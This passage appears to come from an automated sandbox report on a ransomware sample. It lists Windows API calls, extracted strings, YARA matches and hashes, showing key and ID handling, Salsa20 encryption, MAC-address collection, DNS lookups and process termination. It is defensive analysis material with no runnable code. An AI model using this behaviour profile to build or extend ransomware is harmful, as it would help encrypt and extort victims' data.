                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F2EA59
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F2EA74
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F2EA82
                                                                                                        • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 00F2EA92
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F2EAA4
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F2EABA
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F2EAC8
                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 00F2EAE3
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2EB5B
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F2EB7C
                                                                                                        • _malloc.LIBCMT ref: 00F2EB86
                                                                                                        • _memset.LIBCMT ref: 00F2EB94
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 00F2EBAE
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2EBB6
                                                                                                        • _strstr.LIBCMT ref: 00F2EBDA
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F2EC00
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F2EC24
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F2EC32
                                                                                                        • lstrlenW.KERNEL32(?), ref: 00F2EC3E
                                                                                                        • lstrlenA.KERNEL32(","id":"), ref: 00F2EC51
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F2EC6D
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F2EC7F
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F2EC93
                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 00F2ECB3
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2ED2A
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F2ED4B
                                                                                                        • _malloc.LIBCMT ref: 00F2ED55
                                                                                                        • _memset.LIBCMT ref: 00F2ED63
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 00F2ED7D
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2ED85
                                                                                                        • lstrlenW.KERNEL32(?), ref: 00F2EDA3
                                                                                                        • lstrlenW.KERNEL32(?), ref: 00F2EDAE
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F2EDD3
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F2EDF7
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F2EE05
                                                                                                        • _free.LIBCMT ref: 00F2EE15
                                                                                                        • _free.LIBCMT ref: 00F2EE22
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2EF61
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2EFBF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$lstrcpy$Path$FolderInternet$AppendFile$CloseDeleteOpen_memset$ByteCharHandleMultiWide_free_malloc_strstr$QueryReadTimeValue_memmove_wcsstrlstrcattime
                                                                                                        • String ID: "$","id":"$&first=false$&first=true$.bit/$?pid=$Microsoft Internet Explorer$bowsakkdestx.txt${"public_key":"
                                                                                                        • API String ID: 704684250-3586605218
                                                                                                        • Opcode ID: fe531abdce3c8af28a3d05fe7623f5492ed44d86a089232700f1a025c8f79c27
                                                                                                        • Instruction ID: 4207fb255e77c5eeed980dc2708253155412c975dff45614a4fb41ed8462c74c
                                                                                                        • Opcode Fuzzy Hash: fe531abdce3c8af28a3d05fe7623f5492ed44d86a089232700f1a025c8f79c27
                                                                                                        • Instruction Fuzzy Hash: 15424671508351ABDB20EF24DC49B9BBBE8BF84314F14092DF48587292DB74E648DBA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • _wcsstr.LIBCMT ref: 00F1DD8D
                                                                                                        • _wcsstr.LIBCMT ref: 00F1DDB6
                                                                                                        • _memset.LIBCMT ref: 00F1DDE4
                                                                                                        • lstrlenW.KERNEL32(?), ref: 00F1DE0A
                                                                                                        • gethostbyname.WS2_32(01010134), ref: 00F1DEA7
                                                                                                        • inet_ntoa.WS2_32(?), ref: 00F1DEC7
                                                                                                          • Part of subcall function 00F5F26C: std::exception::exception.LIBCMT ref: 00F5F27F
                                                                                                          • Part of subcall function 00F5F26C: __CxxThrowException@8.LIBCMT ref: 00F5F294
                                                                                                          • Part of subcall function 00F5F26C: std::exception::exception.LIBCMT ref: 00F5F2AD
                                                                                                          • Part of subcall function 00F5F26C: __CxxThrowException@8.LIBCMT ref: 00F5F2C2
                                                                                                          • Part of subcall function 00F5F26C: std::regex_error::regex_error.LIBCPMT ref: 00F5F2D4
                                                                                                          • Part of subcall function 00F5F26C: __CxxThrowException@8.LIBCMT ref: 00F5F2E2
                                                                                                          • Part of subcall function 00F5F26C: std::exception::exception.LIBCMT ref: 00F5F2FB
                                                                                                          • Part of subcall function 00F5F26C: __CxxThrowException@8.LIBCMT ref: 00F5F310
                                                                                                        • _memmove.LIBCMT ref: 00F1DF8C
                                                                                                        • _memmove.LIBCMT ref: 00F1DFFC
                                                                                                        • _wcsstr.LIBCMT ref: 00F1E06C
                                                                                                        • LocalAlloc.KERNEL32(00000040,00000008), ref: 00F1E07E
                                                                                                        • inet_addr.WS2_32(?), ref: 00F1E0C1
                                                                                                        • DnsQuery_W.DNSAPI(?,00000002,00000002,?,?,00000000), ref: 00F1E0E5
                                                                                                        • inet_ntoa.WS2_32(?), ref: 00F1E103
                                                                                                        • _memmove.LIBCMT ref: 00F1E33B
                                                                                                        • _memmove.LIBCMT ref: 00F1E40F
                                                                                                        • LocalFree.KERNEL32(?), ref: 00F1E495
                                                                                                        • DnsFree.DNSAPI(?,00000001), ref: 00F1E4A0
                                                                                                        • _memset.LIBCMT ref: 00F1E4BC
                                                                                                        • lstrcpyW.KERNEL32(?,http://), ref: 00F1E4D0
                                                                                                        • lstrcatW.KERNEL32(?,00000000), ref: 00F1E523
                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 00F1E549
                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 00F1E56A
                                                                                                        Strings
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw_memmove$_wcsstrlstrcatstd::exception::exception$FreeLocal_memsetinet_ntoa$AllocQuery_gethostbynameinet_addrlstrcpylstrlenstd::regex_error::regex_error
                                                                                                        • String ID: http://$https://$invalid string position$vector<T> too long
                                                                                                        • API String ID: 2428799424-3687932381
                                                                                                        • Opcode ID: 7ed3b4b9335279cf94f9955066be476ee45eaf868b9804897e672dfb08e7394e
                                                                                                        • Instruction ID: 5584373e556fee1576dbf39795fc2e0597fcbb6d51a65717c86965f719f8a470
                                                                                                        • Opcode Fuzzy Hash: 7ed3b4b9335279cf94f9955066be476ee45eaf868b9804897e672dfb08e7394e
                                                                                                        • Instruction Fuzzy Hash: 1452EF71E002199FCF28CF68CC947EEBBF1BF18314F188169E846AB241D7759A85DB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00F21010
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F21026
                                                                                                          • Part of subcall function 00F40ECA: RaiseException.KERNEL32(?,?,?,0101793C,?,?,?,?,?,00F33B9C,?,0101793C,?,00000001), ref: 00F40F1F
                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00F2103B
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F21051
                                                                                                        • lstrlenA.KERNEL32(?,00000000), ref: 00F21059
                                                                                                        • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00F21064
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F2107A
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00F21099
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F210AB
                                                                                                        • _memset.LIBCMT ref: 00F210CA
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00F210DE
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F210F0
                                                                                                        • _malloc.LIBCMT ref: 00F21100
                                                                                                        • _memset.LIBCMT ref: 00F2110B
                                                                                                        • _sprintf.LIBCMT ref: 00F2112E
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00F2113C
                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 00F21154
                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00F2115F
                                                                                                        Strings
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                        • String ID: %.2X
                                                                                                        • API String ID: 2451520719-213608013
                                                                                                        • Opcode ID: 25848e36505827efa5e74637b248e959261bce099ea9790cb5b86f1ec9ce6b57
                                                                                                        • Instruction ID: 4f4eb604ab3fcd41e926586b5c86bab999cb2c7e3d34c52e25dcb08080fb1254
                                                                                                        • Opcode Fuzzy Hash: 25848e36505827efa5e74637b248e959261bce099ea9790cb5b86f1ec9ce6b57
                                                                                                        • Instruction Fuzzy Hash: 61518E71D40219ABDB11DBA0DC46FEFBBB9FB04714F104026FA00F6280EB795A01ABA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32 ref: 00F21915
                                                                                                        • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00F21932
                                                                                                        • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00F21941
                                                                                                        • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00F21948
                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00F21956
                                                                                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00F21962
                                                                                                        • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00F21974
                                                                                                        • lstrcatW.KERNEL32(00000000,?), ref: 00F2198B
                                                                                                        • lstrcatW.KERNEL32(00000000,01010260), ref: 00F21993
                                                                                                        • lstrcatW.KERNEL32(00000000,?), ref: 00F21999
                                                                                                        • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00F219A3
                                                                                                        • _memset.LIBCMT ref: 00F219B8
                                                                                                        • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 00F219DC
                                                                                                          • Part of subcall function 00F22BA0: lstrlenW.KERNEL32(?), ref: 00F22BC9
                                                                                                        • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00F21A01
                                                                                                        • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00F21A04
                                                                                                        Strings
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                        • String ID: failed with error
                                                                                                        • API String ID: 4182478520-946485432
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                          • Part of subcall function 00F21AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F21ACA
                                                                                                          • Part of subcall function 00F21AB0: DispatchMessageW.USER32(?), ref: 00F21AE0
                                                                                                          • Part of subcall function 00F21AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F21AEE
                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 00F1F900
                                                                                                        • _memmove.LIBCMT ref: 00F1F9EA
                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 00F1FA51
                                                                                                        • _memmove.LIBCMT ref: 00F1FADA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                        • String ID:
                                                                                                        • API String ID: 273148273-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,0100FCA4,00000000,00000000), ref: 00F1E8CE
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1E8E4
                                                                                                          • Part of subcall function 00F40ECA: RaiseException.KERNEL32(?,?,?,0101793C,?,?,?,?,?,00F33B9C,?,0101793C,?,00000001), ref: 00F40F1F
                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00F1E8F9
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1E90F
                                                                                                        • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 00F1E928
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1E93E
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00F1E95D
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1E96F
                                                                                                        • _memset.LIBCMT ref: 00F1E98E
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00F1E9A2
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1E9B4
                                                                                                        • _sprintf.LIBCMT ref: 00F1E9D3
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                        • String ID: %.2X
                                                                                                        • API String ID: 1084002244-213608013
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,0100FCA4,00000000), ref: 00F1EB01
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1EB17
                                                                                                          • Part of subcall function 00F40ECA: RaiseException.KERNEL32(?,?,?,0101793C,?,?,?,?,?,00F33B9C,?,0101793C,?,00000001), ref: 00F40F1F
                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00F1EB2C
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1EB42
                                                                                                        • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 00F1EB4E
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1EB64
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 00F1EB83
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1EB95
                                                                                                        • _memset.LIBCMT ref: 00F1EBB4
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00F1EBC8
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1EBDA
                                                                                                        • _sprintf.LIBCMT ref: 00F1EBF4
                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 00F1EC44
                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00F1EC4F
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                        • String ID: %.2X
                                                                                                        • API String ID: 1637485200-213608013
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                          • Part of subcall function 00F649A0: GetModuleHandleA.KERNEL32(?,?,00000001,?,00F64B72), ref: 00F649C7
                                                                                                          • Part of subcall function 00F649A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 00F649D7
                                                                                                          • Part of subcall function 00F649A0: GetDesktopWindow.USER32 ref: 00F649FB
                                                                                                          • Part of subcall function 00F649A0: GetProcessWindowStation.USER32(?,00F64B72), ref: 00F64A01
                                                                                                          • Part of subcall function 00F649A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00F64B72), ref: 00F64A1C
                                                                                                          • Part of subcall function 00F649A0: GetLastError.KERNEL32(?,00F64B72), ref: 00F64A2A
                                                                                                          • Part of subcall function 00F649A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00F64B72), ref: 00F64A65
                                                                                                          • Part of subcall function 00F649A0: _wcsstr.LIBCMT ref: 00F64A8A
                                                                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00F92316
                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00F92323
                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00F92338
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00F92341
                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 00F9234E
                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00F9235C
                                                                                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 00F9236E
                                                                                                        • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 00F923CA
                                                                                                        • GetBitmapBits.GDI32(?,?,00000000), ref: 00F923D6
                                                                                                        • SelectObject.GDI32(?,?), ref: 00F92436
                                                                                                        • DeleteObject.GDI32(00000000), ref: 00F9243D
                                                                                                        • DeleteDC.GDI32(?), ref: 00F9244A
                                                                                                        • DeleteDC.GDI32(?), ref: 00F92450
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                        • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                                        • API String ID: 151064509-1805842116
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • _malloc.LIBCMT ref: 00F1E67F
                                                                                                          • Part of subcall function 00F30C62: __FF_MSGBANNER.LIBCMT ref: 00F30C79
                                                                                                          • Part of subcall function 00F30C62: __NMSG_WRITE.LIBCMT ref: 00F30C80
                                                                                                          • Part of subcall function 00F30C62: HeapAlloc.KERNEL32(00C00000,00000000,00000001,?,?,?,?,00F33B69,?), ref: 00F30CA5
                                                                                                        • _malloc.LIBCMT ref: 00F1E68B
                                                                                                        • _wprintf.LIBCMT ref: 00F1E69E
                                                                                                        • _free.LIBCMT ref: 00F1E6A4
                                                                                                          • Part of subcall function 00F30BED: HeapFree.KERNEL32(00000000,00000000,?,00F3507F,00000000,00F3520D,00F30CE9), ref: 00F30C01
                                                                                                          • Part of subcall function 00F30BED: GetLastError.KERNEL32(00000000,?,00F3507F,00000000,00F3520D,00F30CE9), ref: 00F30C13
                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 00F1E6B9
                                                                                                        • _free.LIBCMT ref: 00F1E6C5
                                                                                                        • _malloc.LIBCMT ref: 00F1E6CD
                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 00F1E6E0
                                                                                                        • _sprintf.LIBCMT ref: 00F1E720
                                                                                                        • _wprintf.LIBCMT ref: 00F1E732
                                                                                                        • _wprintf.LIBCMT ref: 00F1E73C
                                                                                                        • _free.LIBCMT ref: 00F1E745
                                                                                                        Strings
                                                                                                        • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 00F1E71A
                                                                                                        • Error allocating memory needed to call GetAdaptersinfo, xrefs: 00F1E699
                                                                                                        • Address: %s, mac: %s, xrefs: 00F1E72D
                                                                                                        Similarity
                                                                                                        • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocErrorFreeLast_sprintf
                                                                                                        • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                        • API String ID: 473631332-1604013687
                                                                                                        • Opcode ID: 2b7cb3c81c667e2156f85e0907cccd429141eb933b4fb74faebaffc2a0071c88
                                                                                                        • Instruction ID: 7c93f966713febd6f43837ff1c67571cdba138d5d79d14714c1f8548c3f89b77
                                                                                                        • Opcode Fuzzy Hash: 2b7cb3c81c667e2156f85e0907cccd429141eb933b4fb74faebaffc2a0071c88
                                                                                                        • Instruction Fuzzy Hash: 411106B29045587AD272A3B55C12EFF76EC8F46761F08016AFECCD5141EA5C5A01B3B1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                          • Part of subcall function 00F21AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F21ACA
                                                                                                          • Part of subcall function 00F21AB0: DispatchMessageW.USER32(?), ref: 00F21AE0
                                                                                                          • Part of subcall function 00F21AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F21AEE
                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000), ref: 00F20346
                                                                                                        • _memmove.LIBCMT ref: 00F20427
                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 00F2048E
                                                                                                        • _memmove.LIBCMT ref: 00F20514
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                        • String ID:
                                                                                                        • API String ID: 273148273-0
                                                                                                        • Opcode ID: 72be00791f2f2c6e05b4968a77bdc7ca1bf8c07d038122a66fbbf202a2b028d1
                                                                                                        • Instruction ID: 788a37fd46c2731d6ebc63c7f8c1377b0694359d7d344446144fdcaa114972bf
                                                                                                        • Opcode Fuzzy Hash: 72be00791f2f2c6e05b4968a77bdc7ca1bf8c07d038122a66fbbf202a2b028d1
                                                                                                        • Instruction Fuzzy Hash: 9E42AB72D00228DBDF10EFA4DC85BEEB7F5BF04308F244169E405A7252EB75AA45DBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3232302685-0
                                                                                                        • Opcode ID: a236c2b7f7bc279c4751a13025b5b54209956b028c02603671379d23f02120ff
                                                                                                        • Instruction ID: ba34a8ae6d03209255882d96c0aee3f65dc5c4c5cb6e0c7a9d981bdedc1ca409
                                                                                                        • Opcode Fuzzy Hash: a236c2b7f7bc279c4751a13025b5b54209956b028c02603671379d23f02120ff
                                                                                                        • Instruction Fuzzy Hash: 0AB1CD71D00219DBDF20DFA4DC45BEEB7B5BF14318F104069E409AB252EB359A89EF92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00F2244F
                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00F22469
                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F224A1
                                                                                                        • TerminateProcess.KERNEL32(00000000,00000009), ref: 00F224B0
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F224B7
                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00F224C1
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F224CD
                                                                                                        Strings
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                        • String ID: cmd.exe
                                                                                                        • API String ID: 2696918072-723907552
                                                                                                        • Opcode ID: 5b5289c0772047087c1fcac2e19ae2af5b390dd679cecab2b9cc3967b962dea1
                                                                                                        • Instruction ID: 74b34f0a560826bd86cc79d57ea010983a12cc4df81550bf31f7137bc438e688
                                                                                                        • Opcode Fuzzy Hash: 5b5289c0772047087c1fcac2e19ae2af5b390dd679cecab2b9cc3967b962dea1
                                                                                                        • Instruction Fuzzy Hash: D401963290222A7BD720A7B1BC4DFAF776CDB04715F000152FD08D2142E66499409AE1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • _wcscmp.LIBCMT ref: 00F482B9
                                                                                                        • _wcscmp.LIBCMT ref: 00F482CA
                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00F48568,?,00000000), ref: 00F482E6
                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00F48568,?,00000000), ref: 00F48310
                                                                                                        Strings
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale_wcscmp
                                                                                                        • String ID: ACP$OCP
                                                                                                        • API String ID: 1351282208-711371036
                                                                                                        • Opcode ID: faf33b4fde292ef0379bda4de5632ae41479b707e3961a7339c999803269385d
                                                                                                        • Instruction ID: 3ecd29be6da16623616787b7b7761200d1883f053bb28d77389b1014961c3548
                                                                                                        • Opcode Fuzzy Hash: faf33b4fde292ef0379bda4de5632ae41479b707e3961a7339c999803269385d
                                                                                                        • Instruction Fuzzy Hash: 9B014431A05616AAD7119E58DC45FDE3F99AB05BA5F008015FE04DA051FFB0DB42F7D4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Auth$Genu$cAMD$enti$ineI$ntel
                                                                                                        • API String ID: 0-1714976780
                                                                                                        • Opcode ID: 5f5d6626ad0f6917a330496c5e5681d55bc31fb8fcfe0306b7157049ee0a44b3
                                                                                                        • Instruction ID: 0c34452620d071a1332fde5264ad32c9c1a5bd6aa2c77dfb71082b2f59032e1c
                                                                                                        • Opcode Fuzzy Hash: 5f5d6626ad0f6917a330496c5e5681d55bc31fb8fcfe0306b7157049ee0a44b3
                                                                                                        • Instruction Fuzzy Hash: 92317837F204560AFB7858788C453FD608BA395370F3AC739D326D35C4E8698DC16250
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • input != nullptr && output != nullptr, xrefs: 00F1C095
                                                                                                        • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 00F1C090
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __wassert
                                                                                                        • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                        • API String ID: 3993402318-1975116136
                                                                                                        • Opcode ID: 3ae4ddc2b7fa20cd13afabebd1a95491edd6d3546f55db01dd4af2da2fb07ac2
                                                                                                        • Instruction ID: de06a94da523d87b2abf2ff87c6902075d69443e2c982f1015c6f4912b0a6f63
                                                                                                        • Opcode Fuzzy Hash: 3ae4ddc2b7fa20cd13afabebd1a95491edd6d3546f55db01dd4af2da2fb07ac2
